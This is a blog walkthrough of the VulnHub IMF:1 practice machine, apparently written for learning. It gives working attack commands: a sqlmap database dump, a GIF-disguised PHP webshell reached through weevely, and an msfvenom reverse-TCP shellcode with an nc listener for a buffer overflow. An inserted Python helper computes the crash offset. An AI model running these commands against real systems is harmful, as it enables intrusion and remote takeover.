IMF:1 VulnHub Walkthrough


Hello everyone, in this blog I am going to post a walkthrough of IMF: 1.

This machine is a perfect example of a buffer overflow.

You can download the machine from this link: https://www.vulnhub.com/entry/imf-1,162/

Let's start.

Target IP: 192.168.75.139

Attacker IP: 192.168.75.175

Let's start with nmap:

nmap -Pn -sV 192.168.75.139

OK, there is one port open:

80 - http

Let's see what is running on port 80.

Now we check the page source.

There we got our first flag (flag 1).

Now I use the Decoder tab in Burp Suite to decode the flag.

I got allthefiles.

Looking closely at the source of contact.php, we found another hash.

Again we used Burp Decoder and found our next flag (flag 2).

Decoding that hash again gave us /imfadministrator.

On checking /allthefiles, nothing showed up.

But when I tried /imfadministrator, bingo: I got a login page asking for a username and password.

Then, on checking the page source, I found that it might be vulnerable to SQL injection.

So I used Burp Suite to exploit it.

I set the payloads and ran the attack, but nothing came up; it kept showing INVALID USER.

So on further enumeration, I found that there were 3 usernames.

So, on testing, it was rmichaels; I got the 3rd flag successfully.

On decoding the hash, it said continue to cms.

So on entering cms.php I got access to the main site.

Now, on running sqlmap, we got the databases:

sqlmap -r sqli2 --risk=3 --level=5 --dbs --dump --batch --threads=10

We got 4 databases.

In tutorials-incomplete we found a source = "./images/whiteboard.jpg".

On trying it we got an image.

There we can see a QR code; on decoding it we got our next flag (flag 4).

On further decoding the hash of flag 4 we got upload942.php.

On opening it we got a page with an upload form.

Now I uploaded a PHP file to get shell access.

But it seems that PHP is filtered.

So I tried to upload the malicious code as a GIF and, boom, it was a success. On checking the page source I found something interesting.

Actually it was the same file (GIF) that we uploaded, but the server changed its name to eb7e25c6b97d.

So now we used weevely to get a limited shell:

weevely http://192.168.75.139/imfadministrator/uploads/eb7e25c6b97d.gif test

And we got the limited shell.

On doing ls we got our next flag (flag 5).

On decoding it we got agentservices.

On searching for a file named agent we found the binary:

find / -name agent 2>/dev/null

/usr/local/bin/agent

On running it we got the IMF system, and it was asking for an agent ID that we don't have.

On reading it and listing the directory (ls) we got the access codes.

On reading the access codes file and checking the services, we found that port 7788 is also open, which we were not able to find during the normal nmap scan.

So we had 3 ports, and I knocked them so that we could find something useful.

Now we can see that port 7788 is also open.

So now I used a tool called retdec. It is basically a decompiler, so we can decompile the IMF agent binary with it.

You can download retdec from this link: https://github.com/avast/retdec

So to do that I used /usr/local/bin/agent and /root/retdec/bin/agent, so that retdec can decompile the IMF agent binary.

So as you can see we have got /root/retdec/bin, which contains the IMF agent binary.

So, on executing decompiler.py, we got the agent ID value 0x2ddd984. On echoing it with echo $((0x2ddd984)) I got the agent ID: 48093572.

Now we chmod the agent binary to give it execute permission.

Now, as we enter option 3, we see that it records the data that is input, so when I tried to fuzz it with 'A's I found a buffer overflow vulnerability in it.

So, as is standard for a buffer overflow, I created a cyclic pattern with pattern_create (locate pattern_create):

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200

So I used gdb, the debugger that comes preinstalled on Kali.

Just run gdb agent.

Now, on entering option 3, we enter the pattern that we created.

And we found that EIP was overwritten with the value 41366641, which gives us the exact offset.

So now we created a pattern with that same value.
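The pattern step above, as an added example that is not part of the original post: a small Python reimplementation of what pattern_create.rb and pattern_offset.rb do, assuming an x86 (little-endian) target as on this machine. It maps the EIP value 41366641 seen in gdb back to its position in the 200-byte pattern, which tells you how many bytes of input sit in front of the saved return address.

```python
import string

# Added example (not from the original post or from Metasploit itself):
# a reimplementation of the pattern_create / pattern_offset logic used in
# the walkthrough to triage the crash in the agent binary's option 3.


def cyclic_pattern(length):
    """Build the Aa0Aa1...Aa9Ab0... pattern that pattern_create.rb emits."""
    chunks = []
    size = 0
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                size += 3
                if size >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(eip_value, length=200, little_endian=True):
    """Return the offset of the 4 pattern bytes that landed in EIP, or -1.

    eip_value is the register value as printed by the debugger, for example
    "41366641" or "0x41366641".  On x86 the register is little-endian, so
    0x41366641 corresponds to the substring "Af6A" in the pattern.
    """
    value = int(eip_value, 16)
    raw = value.to_bytes(4, "little" if little_endian else "big")
    try:
        needle = raw.decode("ascii")
    except UnicodeDecodeError:
        return -1  # bytes are not from our pattern: EIP was not overwritten by it
    return cyclic_pattern(length).find(needle)


if __name__ == "__main__":
    # Same pattern length the walkthrough used (-l 200); the 4 bytes in EIP
    # must fall inside it, i.e. offset + 4 <= 200, for the lookup to succeed.
    print(cyclic_pattern(200))
    print(pattern_offset("41366641"))  # -> 168
```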

Now using msfvenom I created a reverse shell payload and removed the bad characters ("\x00\x0a\x0d"):

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ip of kali> LPORT=4448 -f python -b "\x00\x0a\x0d"

So I copied this shellcode into the exploit file that I downloaded online, and changed my IP and port (just google imf reverse shell).

Now I opened a listener using nc -nlvp 4448

And ran the python file: python agentsploit.py ip port

We got root access!

Writer: Shubhankar is Cyber Security Intern at Azure Skynet Solutions Pvt Ltd. You can contact him here.
